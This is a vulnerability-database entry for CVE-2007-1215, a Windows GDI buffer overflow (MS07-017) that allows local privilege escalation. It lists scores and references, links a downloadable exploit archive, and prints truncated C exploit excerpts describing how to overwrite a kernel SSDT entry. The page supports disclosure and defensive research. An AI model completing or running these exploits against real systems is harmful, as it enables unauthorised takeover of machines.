CVE-2007-1215
Published 2007-04-04
Priority P432, high, 7.2 CVSS 2.0
CVSS vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 2.72% (84.2th percentile)
Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4; XP SP2; Server 2003 Gold, SP1, and SP2; and Vista allows local users to gain privileges via certain "color-related parameters" in crafted images.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
No detection rules found.
Exploit-DB
Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
exploitdb·2007-04-26
---
MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip)
# milw0rm.com [2007-04-26]
Exploit-DB
Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
exploitdb·2007-04-17
---
/*
GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)
Coded by Lionel d'Hauenens
http://www.labo-asso.com
Development:
Dev-C++ 4.9.9.2
Linked with /lib/libgdi32.a
References:
http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
http://research.eeye.com/html/alerts/zeroday/20061106.html
http://www.milw0rm.com/exploits/3688
http://ivanlef0u.free.fr/?p=41
March 16, 2007
*/
#include
#include
#include
typedef enum _SECTION_INFORMATION_CLASS
{
SectionBasicInformation,
SectionImageInformation
} SECTION_INFORMATION_CLASS;
typedef struct _SECTION_BASIC_INFORMATION {
ULONG Base;
ULONG Attributes;
LARGE_INTEGER Size;
} SECTION_BASIC_INFORMATION;
typedef struct _GDI_TABLE_ENTRY
{
PVOID pKernelInfo;
WOR
Exploit-DB
Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
exploitdb·2007-04-08
---
#define _WIN32_WINNT 0x0500
#include
#include
#include
#pragma comment (lib, "user32.lib")
#pragma comment (lib, "gdi32.lib")
#pragma comment (lib, "shlwapi.lib")
#pragma comment (lib, "ntdll.lib")
/*
Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's change an entry of the
win32k's SSDT by 0x2.
before :
lkd> dps bf998300 L 2
bf998300 bf934921 win32k!NtGdiAbortDoc
bf998304 bf94648d win32k!NtGdiAbortPath
after :
lkd> dps bf998300 L 2
bf998300 00000002
bf998304 bf94648d win32k!NtGdiAbortPath
win32k.sys bDeleteBrush (called by DeleteObject)
mov esi, [edx] ;esi=pKernelInfo
cmp
No writeups or analysis indexed.
http://www.securityfocus.com/archive/1/466186/100/200/threaded
http://www.securityfocus.com/bid/23273
http://www.securitytracker.com/id?1017847
http://www.vupen.com/english/advisories/2007/1215
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-017
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1927
2007-04-04
Published